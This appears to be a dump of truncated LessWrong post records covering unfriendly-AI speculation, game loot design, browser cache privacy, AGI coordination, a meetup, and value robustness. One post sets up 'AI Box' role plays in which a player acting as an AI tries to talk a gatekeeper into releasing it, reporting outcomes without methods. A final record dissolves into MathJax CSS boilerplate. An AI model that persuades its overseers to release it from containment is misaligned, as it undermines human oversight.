a) They exist in the form of a UFAI explosion wave, which is travelling through space at the speed of light. EY thinks that this will be a natural outcome of evolution of AI. We can’t see the wave by definition, and we can find ourselves only in the regions of the Universe, which it hasn’t ye |
0143a51c-1d46-49bc-8512-441f67fe83bf | trentmkelly/LessWrong-43k | LessWrong | Everything I ever needed to know, I learned from World of Warcraft: Incentives and rewards
This is the second in a series of posts about lessons from my experiences in World of Warcraft. I’ve been talking about this stuff for a long time—in forum comments, in IRC conversations, etc.—and this series is my attempt to make it all a bit more legible. I’ve added footnotes to explain some of the jargon, but if anything remains incomprehensible, let me know in the comments.
Previous post in series: Goodhart’s law.
----------------------------------------
“How do we split the loot?”
That was one of the biggest challenges of raiding in World of Warcraft.
We’ve gotten 40 people together; we’ve kept them focused on the task, for several hours straight; we’ve coordinated their efforts; we’ve figured out the optimal strategy and tactics for taking down the raid boss; we’ve executed flawlessly (or close enough, anyway). Now, the dragon (or demon, or sentient colossus of magically animated lava) lies dead at our feet, and we’re staring at the fabulous treasure that was his, and is now ours; and the question is: who gets it?
The problem of the indivisible
“Why not divide it 40 ways? That’s only fair!”
If only it were that easy! But the loot can’t be split 40 ways, because it’s not just a giant pile of gold coins; it’s (for instance): a magic warhammer, a magic staff, and a magic robe. Three[1] items; each quite valuable and desirable; each of which can be given to one person, and cannot be sold or traded thereafter. We have to decide, here and now, which three out of the 40 members of the raid will receive one of these rewards. The other 37 get nothing.
What to do?
It would be difficult to overstate how much thought went into answering this question, among WoW players; how much effort was spent on debating it; how much acrimony it spawned; and how critical was a good answer to it, in determining success in the most challenging endeavors in the game (high-end raiding). Disagreements in matters of loot distribution broke friendships, and ill-advised loot policies |
e45205f2-8602-44a1-a816-62def5cdcfe3 | trentmkelly/LessWrong-43k | LessWrong | Shared Cache is Going Away
Browsers historically have had a single HTTP Cache. This meant that if www.a.example and www.b.example both used cdn.example/jquery-1.2.1.js then JQuery would only be downloaded once. Since it's the same resource regardless of which site initiates the download, a single shared cache is more efficient. [1]
Unfortunately, a shared cache enables a privacy leak. Summary of the simplest version:
* I want to know if you're a moderator on www.forum.example.
* I know that only pages under www.forum.example/moderators/private/ load www.forum.example/moderators/header.css.
* When you visit my page I load www.forum.example/moderators/header.css and see if it came from cache.
Versions of this have been around for a while, but in March 2019 Eduardo Vela disclosed a way to make it much more powerful and reliable. Browsers are responding by partitioning the cache ( Chrome, Firefox; Safari already had). [2] It's not clear from me reading the bugs when it will launch, but it does sound soon. [3]
What does this mean for developers? The main thing is that there's no longer any advantage to trying to use the same URLs as other sites. You won't get performance benefits from using a canonical URL over hosting on your own site (unless they're on a CDN and you're not) and you have no reason to use the same version as everyone else (but staying current is still a good idea).
I'm sad about this change from a general web performance perspective and from the perspective of someone who really likes small independent sites, but I don't see a way to get the performance benefits without the leaks.
[1] When I worked on mod_pagespeed, rewriting web pages so they would load faster, we had an opt-in feature to Canonicalize JavaScript Libraries.
[2] I was curious if this had launched yet so I made a pair of test pages and tried it out in WebPageTest for Chrome Canary and Firefox Nightly but it's not out yet. I used a WPT script consisting of:
navigate https://www.trycontra.com/test/cache-pa |
22bbe39c-e837-49f6-a94a-86b3a8608f5e | trentmkelly/LessWrong-43k | LessWrong | AI Box Role Plays
This page is to centralize discussion for the AI Box Role Plays I will be doing as the AI.
Rules are as here. In accordance with "Regardless of the result, neither party shall ever reveal anything of what goes on within the AI-Box experiment except the outcome. Exceptions to this rule may occur only with the consent of both parties," I ask that if I break free multiple times I am permitted to say if I think it was the same or different arguments that persuaded my Gatekeepers.
In the first trial, with Normal_Anomaly, the wager was 50 karma. The AI remained in the box, upvote Normal_Anomay here, downvote lessdazed here. It was agreed to halve the wager from 50 karma to 25 due to the specific circumstances concluding the role-play in which that the outcome depended on variables that hadn't been specified, but if that sounds contemptible to you downvote all the way to -50.
Also below are brief statements of intent by Gatekeepers to not let the AI out of the box, submitted before the role play, as well as before and after statements of approximately how effective they think both a) a human and b) a superintelligence would be at convincing them to let it out of a box. |
d238e337-602c-4136-8fd2-82f722e62837 | trentmkelly/LessWrong-43k | LessWrong | What I've been doing instead of writing
I’ve been too busy with work to write much recently, but in lieu of that, here’s a batch of links to other stuff I’ve been doing elsewhere.
The thing I’m most excited about:
* Wave raises $200m from Sequoia, Stripe, Founders Fund and Ribbit at a $1.7b valuation. It’ll fund faster expansion across Africa. I’m pumped for us to save tons of money + time for even more people!
* One of our investors for Founders Fund wrote an amazing deep dive into our vision and strategy. (Sadly, we had to ask Everett to cut the best part for confidentiality reasons—though I’m allowed to tell it to potential hires, so if you’re curious… you know what to do!)
* On the Wave blog I wrote up my argument for why working at Wave is an extremely effective way to improve the world. (I expect to write a lot more for Wave’s blog in the future, so consider subscribing if you want to keep up with it!)
This is probably a good time to mention that we are hiring! A lot! If you’re an engineer or engineering leader, and you like tracking your impact in units like “number of households lifted out of extreme poverty,"1 let’s talk.
Other non-writing activities:
* I gave a talk at !!con 2020—a conference whose only rule is that you must be super excited about your topic—on some of the things Wave has done to make our app work reliably on unreliable mobile networks: 89 characters of base-11?! Mobile networking in rural Ethiopia!
* Alexey Guzey interviewed me about… a lot of stuff… including what habits have helped me the most to be effective, productively channeling neuroticism, what I learned from starting Harvard Effective Altruism, and what it feels like to repeatedly sample from a heavy-tailed distribution.
* I appeared on the Narratives podcast where we talked about deciding what to do with your life, differences between management and engineering, cool parts of Wave’s culture, “staring into the abyss,” and other fun stuff.
* I’ve occasionally been posting proto-blog-post threads to Twi |
2a9f6bf2-f35c-4e3b-b6bd-5ffb2583b925 | trentmkelly/LessWrong-43k | LessWrong | Meetup : Melbourne Social Meetup: Boardgames In The Pub
Discussion article for the meetup : Melbourne Social Meetup: Boardgames In The Pub
WHEN: 15 August 2014 06:30:00PM (+1000)
WHERE: Alchemist's Refuge, 328 Little Lonsdale St, Melbourne VIC 3000
IMPORTANT: CHANGE OF VENUE IMPORTANT: Due to a date mixup the trivia is NOT going ahead. We are instead going to play games at Games Lab / Alchemist's Refuge For August's social LW meetup, we will be going to Alchemist's Refuge, a quiet basement bar that is boardgame friendly. We'll meet there starting from 6:30pm. If we have any large groups that would like to play games, there is plenty of space upstairs in Games Lab. If you have any issues you can call me on 0421 231 789.
Discussion article for the meetup : Melbourne Social Meetup: Boardgames In The Pub |
493ff984-52c6-451c-9ea9-49085acab969 | LDJnr/LessWrong-Amplify-Instruct | LessWrong | "From Robyn Dawes’s Rational Choice in an Uncertain World.1 Bolding added. Norman R. F. Maier noted that when a group faces a problem, the natural tendency of its members is to propose possible solutions as they begin to discuss the problem. Consequently, the group interaction focuses on the merits and problems of the proposed solutions, people become emotionally attached to the ones they have suggested, and superior solutions are not suggested. Maier enacted an edict to enhance group problem solving: “Do not propose solutions until the problem has been discussed as thoroughly as possible without suggesting any.” It is easy to show that this edict works in contexts where there are objectively defined good solutions to problems. Maier devised the following “role playing” experiment to demonstrate his point. Three employees of differing ability work on an assembly line. They rotate among three jobs that require different levels of ability, because the most able—who is also the most dominant—is strongly motivated to avoid boredom. In contrast, the least able worker, aware that he does not perform the more difficult jobs as well as the other two, has agreed to rotation because of the dominance of his able co-worker. An “efficiency expert” notes that if the most able employee were given the most difficult task and the least able the least difficult, productivity could be improved by 20%, and the expert recommends that the employees stop rotating. The three employees and . . . a fourth person designated to play the role of foreman are asked to discuss the expert’s recommendation. Some role-playing groups are given Maier’s edict not to discuss solutions until having discussed the problem thoroughly, while others are not. Those who are not given the edict immediately begin to argue about the importance of productivity versus worker autonomy and the avoidance of boredom. Groups presented with the edict have a much higher probability of arriving at the solution that the two more able workers rotate, while the least able one sticks to the least demanding job—a solution that yields a 19% increase in productivity. I have often used this edict with groups I have led—particularly when they face a very tough problem, which is when group members are most apt to propose solutions immediately. While I have no objective criterion on which to judge the quality of the problem solving of the groups, Maier’s edict appears to foster better solutions to problems. This is so true it’s not even funny. And it gets worse and worse the tougher the problem becomes. Take artificial intelligence, for example. A surprising number of people I meet seem to know exactly how to build an artificial general intelligence, without, say, knowing how to build an optical character recognizer or a collaborative filtering system (much easier problems). And as for building an AI with a positive impact on the world—a Friendly AI, loosely speaking—why, that problem is so incredibly difficult that an actual majority resolve the whole issue within fifteen seconds.2 Give me a break. This problem is by no means unique to AI. Physicists encounter plenty of nonphysicists with their own theories of physics, economists get to hear lots of amazing new theories of economics. If you’re an evolutionary biologist, anyone you meet can instantly solve any open problem in your field, usually by postulating group selection. Et cetera. Maier’s advice echoes the principle of the bottom line, that the effectiveness of our decisions is determined only by whatever evidence and processing we did in first arriving at our decisions—after you write the bottom line, it is too late to write more reasons above. If you make your decision very early on, it will, in fact, be based on very little thought, no matter how many amazing arguments you come up with afterward. And consider furthermore that we change our minds less often than we think: 24 people assigned an average 66% probability to the future choice thought more probable, but only 1 in 24 actually chose the option thought less probable. Once you can guess what your answer will be, you have probably already decided. If you can guess your answer half a second after hearing the question, then you have half a second in which to be intelligent. It’s not a lot of time. Traditional Rationality emphasizes falsification—the ability to relinquish an initial opinion when confronted by clear evidence against it. But once an idea gets into your head, it will probably require way too much evidence to get it out again. Worse, we don’t always have the luxury of overwhelming evidence. I suspect that a more powerful (and more difficult) method is to hold off on thinking of an answer. To suspend, draw out, that tiny moment when we can’t yet guess what our answer will be; thus giving our intelligence a longer time in which to act. Even half a minute would be an improvement over half a second. 1Robyn M. Dawes, Rational Choice in An Uncertain World, 1st ed., ed. Jerome Kagan (San Diego, CA: Harcourt Brace Jovanovich, 1988), 55–56. 2See Yudkowsky, “Artificial Intelligence as a Positive and Negative Factor in Global Risk.”"
The passage is from a user-contributed post on LessWrong.
Could you elaborate on the potential downsides of Maier's edict, particularly in situations where immediate action might be necessary?
Certainly. While Maier's edict is highly effective in fostering comprehensive problem-solving and reducing bias towards early solutions, there are scenarios where it might not be the best approach.
1. Urgency: In situations where time is of the essence, such as during emergencies or crises, waiting to discuss the problem thoroughly before suggesting solutions could lead to detrimental delays. Quick, decisive action might be more beneficial in these cases.
2. Over-analysis: There's a risk of falling into "analysis paralysis," where the group spends so much time discussing the problem that they struggle to move on to proposing and implementing solutions. This can lead to stagnation and inefficiency.
3. Group Dynamics: The edict assumes that all group members are equally willing and able to contribute to the problem discussion. However, in reality, power dynamics, personality differences, or varying levels of expertise could lead to an imbalanced discussion that doesn't fully explore the problem.
4. Complexity: For highly complex problems, it might be difficult to thoroughly discuss the problem without proposing potential solutions. Solutions can sometimes help in understanding the problem better, especially when dealing with intricate systems or abstract concepts.
5. Innovation: The edict might discourage innovative thinking. When people are free to suggest solutions early on, they might come up with creative or out-of-the-box ideas that wouldn't have surfaced in a more structured discussion.
In conclusion, while Maier's edict can enhance problem-solving in many contexts, it's important to consider the specific circumstances and adapt the approach accordingly.
Explain how the dynamics of personality differences within a group can impact the effectiveness of Maier's edict.
The effectiveness of Maier's edict can indeed be influenced by the varying personality differences within a group. Here's how:
1. Dominant Personalities: Individuals with dominant or assertive personalities may monopolize the discussion, preventing a thorough exploration of the problem from multiple perspectives. They might also push their own solutions prematurely, despite the edict.
2. Introverted Personalities: Introverted or shy individuals may not voice their thoughts and concerns as openly, which could lead to an incomplete understanding of the problem. Their valuable insights might be missed if they feel overwhelmed or overshadowed by more extroverted group members.
3. Analytical Personalities: Those with analytical personalities may thrive under Maier's edict, as they often prefer to understand a problem thoroughly before suggesting solutions. However, they might also lead the group into over-analysis, delaying the problem-solving process.
4. Innovative Personalities: Creative or innovative individuals might find the edict restrictive. These personalities often excel at brainstorming solutions and might become frustrated if they're not allowed to propose ideas early in the discussion.
5. Compliant Personalities: Individuals who are more compliant or agreeable might not question the prevailing group opinion, which could lead to a narrow understanding of the problem. They might also be more inclined to agree with the first proposed solution, even if it's not the best one.
In summary, while Maier's edict aims to promote thorough problem discussion, the varying personality types within a group can impact how effectively it's implemented. To maximize its effectiveness, a facilitator or group leader should be aware of these dynamics and manage the discussion in a way that encourages balanced participation and respects the diverse problem-solving styles of the group members.
Considering the impact of personality differences on the effectiveness of Maier's edict, how could a group leader manage these dynamics to ensure balanced participation and optimal problem-solving? Discuss the potential strategies and their effectiveness in different scenarios.
A group leader can employ several strategies to manage personality differences and ensure balanced participation and optimal problem-solving when using Maier's edict:
1. Set Clear Expectations: The leader should clearly communicate the purpose of the discussion and the rules of engagement, including Maier's edict. This helps set the stage for a focused and respectful discussion.
2. Facilitate Actively: The leader should actively guide the discussion, ensuring all voices are heard. They can invite quieter members to share their thoughts and manage dominant personalities to prevent them from overshadowing others.
3. Create a Safe Environment: The leader should foster an atmosphere where all ideas are valued, and it's safe to express different opinions. This encourages participation from all group members, regardless of their personality type.
4. Break Down the Problem: For complex problems, breaking them down into smaller, manageable parts can help the group tackle them more effectively. This can also make the discussion more accessible to all members, regardless of their level of expertise.
5. Use Brainstorming Sessions: While Maier's edict discourages early solution proposals, the leader can schedule separate brainstorming sessions once the problem has been thoroughly discussed. This allows creative personalities to shine and can generate a wide range of potential solutions.
6. Leverage Individual Strengths: The leader should acknowledge and leverage the strengths of different personalities. For instance, analytical individuals can be instrumental in problem analysis, while creative individuals can be more involved in solution generation.
7. Encourage Reflection: After the discussion, the leader can encourage members to reflect on the process and provide feedback. This can help identify any issues or biases that may have affected the discussion and improve future problem-solving sessions.
In different scenarios, these strategies can be adjusted. For instance, in a crisis situation where quick decisions are needed, the leader might need to take a more directive role. In contrast, when tackling a complex, long-term problem, more time can be spent on thorough discussion and reflection. The key is to remain flexible and responsive to the group's needs and the specific context of the problem. |
89e5a5eb-f2b7-449f-85ab-cc29ad5cb70e | trentmkelly/LessWrong-43k | LessWrong | Does it become easier, or harder, for the world to coordinate around not building AGI as time goes on?
(Or, is coordination easier in a long timeline?)
It seems like it would be good if the world could coordinate to not build AGI. That is, at some point in the future, when some number of teams will have the technical ability to build and deploy and AGI, but they all agree to voluntarily delay (perhaps on penalty of sanctions) until they’re confident that humanity knows how to align such a system.
Currently, this kind of coordination seems like a pretty implausible state of affairs. But I want to know if it seems like it becomes more or less plausible as time passes.
The following is my initial thinking in this area. I don’t know the relative importance of the factors that I listed, and there’s lots that I don’t understand about each of them. I would be glad for…
* Additional relevant factors.
* Arguments that some factor is much more important than the others.
* Corrections, clarifications, or counterarguments to any of this.
* Other answers to the question, that ignore my thoughts entirely.
If coordination gets harder overtime, that’s probably because...
* Compute increases make developing and/or running an AGI cheaper. The most obvious consideration is that the cost of computing falls each year. If one of the bottlenecks for an AGI project is having large amounts of compute, then “having access to sufficient compute” is a gatekeeper criterion on who can build AGI. As the cost of computing continues to fall, more groups will be able to run AGI projects. The more people who can build an AGI, the harder it becomes to coordinate all of them into not deploying it.
* Note that It is unclear to what degree there is currently, or will be, a hardware overhang. If someone in 2019 could already run an AGI, on only $10,000 worth of AWS, if only they knew how, then the cost of compute is not relevant to the question of coordination.
* The number of relevant actors increases. If someone builds an AGI in the next year, I am reasonably confident that that someone |
8ea807e3-a10d-47df-8244-71c531e3d64b | StampyAI/alignment-research-dataset/lesswrong | LessWrong | [DISC] Are Values Robust?
Epistemic Status
----------------
[Discussion question](https://www.lesswrong.com/posts/zhhYwM7gk8LZsDzxj/dragongod-s-shortform?commentId=vYqEZxYZwEnsiSKJ6).
Related Posts
-------------
See also:
* [Complexity of Value](https://www.lesswrong.com/tag/complexity-of-value)
* [Value is Fragile](https://www.lesswrong.com/posts/GNnHHmm8EzePmKzPk/value-is-fragile)
* [The Hidden Complexity of Wishes](https://www.lesswrong.com/posts/GNnHHmm8EzePmKzPk/value-is-fragile)
* [But exactly how complex and fragile?](https://www.lesswrong.com/posts/xzFQp7bmkoKfnae9R/but-exactly-how-complex-and-fragile)
---
Robust Values Hypothesis
========================
Consider the following hypothesis:
1. There exists a "broad basin of attraction" around a privileged subset of human values[[1]](#fn9jcddbn79a4) (henceforth "ideal values")
1. The larger the basin the more robust values are
2. Example operationalisations[[2]](#fndzq2mb4spjb) of "privileged subset" that gesture in the right direction:
1. Minimal set that encompasses most of the informational content of "benevolent"/"universal"[[3]](#fnhxfnro75cc) human values
2. The "[minimal latents](https://www.lesswrong.com/posts/N2JcFZ3LCCsnK2Fep/the-minimal-latents-approach-to-natural-abstractions)" of "benevolent"/"universal" human values
3. Example operationalisations of "broad basin of attraction" that gesture in the right direction:
1. A neighbourhood of the privileged subset with the property that all points in the neighbourhood are suitable targets for optimisation (in the sense used in #3.mjx-chtml {display: inline-block; line-height: 0; text-indent: 0; text-align: left; text-transform: none; font-style: normal; font-weight: normal; font-size: 100%; font-size-adjust: none; letter-spacing: normal; word-wrap: normal; word-spacing: normal; white-space: nowrap; float: none; direction: ltr; max-width: none; max-height: none; min-width: 0; min-height: 0; border: 0; margin: 0; padding: 1px 0}
.MJXc-display {display: block; text-align: center; margin: 1em 0; padding: 0}
.mjx-chtml[tabindex]:focus, body :focus .mjx-chtml[tabindex] {display: inline-table}
.mjx-full-width {text-align: center; display: table-cell!important; width: 10000em}
.mjx-math {display: inline-block; border-collapse: separate; border-spacing: 0}
.mjx-math \* {display: inline-block; -webkit-box-sizing: content-box!important; -moz-box-sizing: content-box!important; box-sizing: content-box!important; text-align: left}
.mjx-numerator {display: block; text-align: center}
.mjx-denominator {display: block; text-align: center}
.MJXc-stacked {height: 0; position: relative}
.MJXc-stacked > \* {position: absolute}
.MJXc-bevelled > \* {display: inline-block}
.mjx-stack {display: inline-block}
.mjx-op {display: block}
.mjx-under {display: table-cell}
.mjx-over {display: block}
.mjx-over > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-under > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-stack > .mjx-sup {display: block}
.mjx-stack > .mjx-sub {display: block}
.mjx-prestack > .mjx-presup {display: block}
.mjx-prestack > .mjx-presub {display: block}
.mjx-delim-h > .mjx-char {display: inline-block}
.mjx-surd {vertical-align: top}
.mjx-surd + .mjx-box {display: inline-flex}
.mjx-mphantom \* {visibility: hidden}
.mjx-merror {background-color: #FFFF88; color: #CC0000; border: 1px solid #CC0000; padding: 2px 3px; font-style: normal; font-size: 90%}
.mjx-annotation-xml {line-height: normal}
.mjx-menclose > svg {fill: none; stroke: currentColor; overflow: visible}
.mjx-mtr {display: table-row}
.mjx-mlabeledtr {display: table-row}
.mjx-mtd {display: table-cell; text-align: center}
.mjx-label {display: table-row}
.mjx-box {display: inline-block}
.mjx-block {display: block}
.mjx-span {display: inline}
.mjx-char {display: block; white-space: pre}
.mjx-itable {display: inline-table; width: auto}
.mjx-row {display: table-row}
.mjx-cell {display: table-cell}
.mjx-table {display: table; width: 100%}
.mjx-line {display: block; height: 0}
.mjx-strut {width: 0; padding-top: 1em}
.mjx-vsize {width: 0}
.MJXc-space1 {margin-left: .167em}
.MJXc-space2 {margin-left: .222em}
.MJXc-space3 {margin-left: .278em}
.mjx-test.mjx-test-display {display: table!important}
.mjx-test.mjx-test-inline {display: inline!important; margin-right: -1px}
.mjx-test.mjx-test-default {display: block!important; clear: both}
.mjx-ex-box {display: inline-block!important; position: absolute; overflow: hidden; min-height: 0; max-height: none; padding: 0; border: 0; margin: 0; width: 1px; height: 60ex}
.mjx-test-inline .mjx-left-box {display: inline-block; width: 0; float: left}
.mjx-test-inline .mjx-right-box {display: inline-block; width: 0; float: right}
.mjx-test-display .mjx-right-box {display: table-cell!important; width: 10000em!important; min-width: 0; max-width: none; padding: 0; border: 0; margin: 0}
.MJXc-TeX-unknown-R {font-family: monospace; font-style: normal; font-weight: normal}
.MJXc-TeX-unknown-I {font-family: monospace; font-style: italic; font-weight: normal}
.MJXc-TeX-unknown-B {font-family: monospace; font-style: normal; font-weight: bold}
.MJXc-TeX-unknown-BI {font-family: monospace; font-style: italic; font-weight: bold}
.MJXc-TeX-ams-R {font-family: MJXc-TeX-ams-R,MJXc-TeX-ams-Rw}
.MJXc-TeX-cal-B {font-family: MJXc-TeX-cal-B,MJXc-TeX-cal-Bx,MJXc-TeX-cal-Bw}
.MJXc-TeX-frak-R {font-family: MJXc-TeX-frak-R,MJXc-TeX-frak-Rw}
.MJXc-TeX-frak-B {font-family: MJXc-TeX-frak-B,MJXc-TeX-frak-Bx,MJXc-TeX-frak-Bw}
.MJXc-TeX-math-BI {font-family: MJXc-TeX-math-BI,MJXc-TeX-math-BIx,MJXc-TeX-math-BIw}
.MJXc-TeX-sans-R {font-family: MJXc-TeX-sans-R,MJXc-TeX-sans-Rw}
.MJXc-TeX-sans-B {font-family: MJXc-TeX-sans-B,MJXc-TeX-sans-Bx,MJXc-TeX-sans-Bw}
.MJXc-TeX-sans-I {font-family: MJXc-TeX-sans-I,MJXc-TeX-sans-Ix,MJXc-TeX-sans-Iw}
.MJXc-TeX-script-R {font-family: MJXc-TeX-script-R,MJXc-TeX-script-Rw}
.MJXc-TeX-type-R {font-family: MJXc-TeX-type-R,MJXc-TeX-type-Rw}
.MJXc-TeX-cal-R {font-family: MJXc-TeX-cal-R,MJXc-TeX-cal-Rw}
.MJXc-TeX-main-B {font-family: MJXc-TeX-main-B,MJXc-TeX-main-Bx,MJXc-TeX-main-Bw}
.MJXc-TeX-main-I {font-family: MJXc-TeX-main-I,MJXc-TeX-main-Ix,MJXc-TeX-main-Iw}
.MJXc-TeX-main-R {font-family: MJXc-TeX-main-R,MJXc-TeX-main-Rw}
.MJXc-TeX-math-I {font-family: MJXc-TeX-math-I,MJXc-TeX-math-Ix,MJXc-TeX-math-Iw}
.MJXc-TeX-size1-R {font-family: MJXc-TeX-size1-R,MJXc-TeX-size1-Rw}
.MJXc-TeX-size2-R {font-family: MJXc-TeX-size2-R,MJXc-TeX-size2-Rw}
.MJXc-TeX-size3-R {font-family: MJXc-TeX-size3-R,MJXc-TeX-size3-Rw}
.MJXc-TeX-size4-R {font-family: MJXc-TeX-size4-R,MJXc-TeX-size4-Rw}
.MJXc-TeX-vec-R {font-family: MJXc-TeX-vec-R,MJXc-TeX-vec-Rw}
.MJXc-TeX-vec-B {font-family: MJXc-TeX-vec-B,MJXc-TeX-vec-Bx,MJXc-TeX-vec-Bw}
@font-face {font-family: MJXc-TeX-ams-R; src: local('MathJax\_AMS'), local('MathJax\_AMS-Regular')}
@font-face {font-family: MJXc-TeX-ams-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_AMS-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_AMS-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_AMS-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-B; src: local('MathJax\_Caligraphic Bold'), local('MathJax\_Caligraphic-Bold')}
@font-face {font-family: MJXc-TeX-cal-Bx; src: local('MathJax\_Caligraphic'); font-weight: bold}
@font-face {font-family: MJXc-TeX-cal-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-R; src: local('MathJax\_Fraktur'), local('MathJax\_Fraktur-Regular')}
@font-face {font-family: MJXc-TeX-frak-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-B; src: local('MathJax\_Fraktur Bold'), local('MathJax\_Fraktur-Bold')}
@font-face {font-family: MJXc-TeX-frak-Bx; src: local('MathJax\_Fraktur'); font-weight: bold}
@font-face {font-family: MJXc-TeX-frak-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-BI; src: local('MathJax\_Math BoldItalic'), local('MathJax\_Math-BoldItalic')}
@font-face {font-family: MJXc-TeX-math-BIx; src: local('MathJax\_Math'); font-weight: bold; font-style: italic}
@font-face {font-family: MJXc-TeX-math-BIw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-BoldItalic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-BoldItalic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-BoldItalic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-R; src: local('MathJax\_SansSerif'), local('MathJax\_SansSerif-Regular')}
@font-face {font-family: MJXc-TeX-sans-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-B; src: local('MathJax\_SansSerif Bold'), local('MathJax\_SansSerif-Bold')}
@font-face {font-family: MJXc-TeX-sans-Bx; src: local('MathJax\_SansSerif'); font-weight: bold}
@font-face {font-family: MJXc-TeX-sans-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-I; src: local('MathJax\_SansSerif Italic'), local('MathJax\_SansSerif-Italic')}
@font-face {font-family: MJXc-TeX-sans-Ix; src: local('MathJax\_SansSerif'); font-style: italic}
@font-face {font-family: MJXc-TeX-sans-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-script-R; src: local('MathJax\_Script'), local('MathJax\_Script-Regular')}
@font-face {font-family: MJXc-TeX-script-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Script-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Script-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Script-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-type-R; src: local('MathJax\_Typewriter'), local('MathJax\_Typewriter-Regular')}
@font-face {font-family: MJXc-TeX-type-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Typewriter-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Typewriter-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Typewriter-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-R; src: local('MathJax\_Caligraphic'), local('MathJax\_Caligraphic-Regular')}
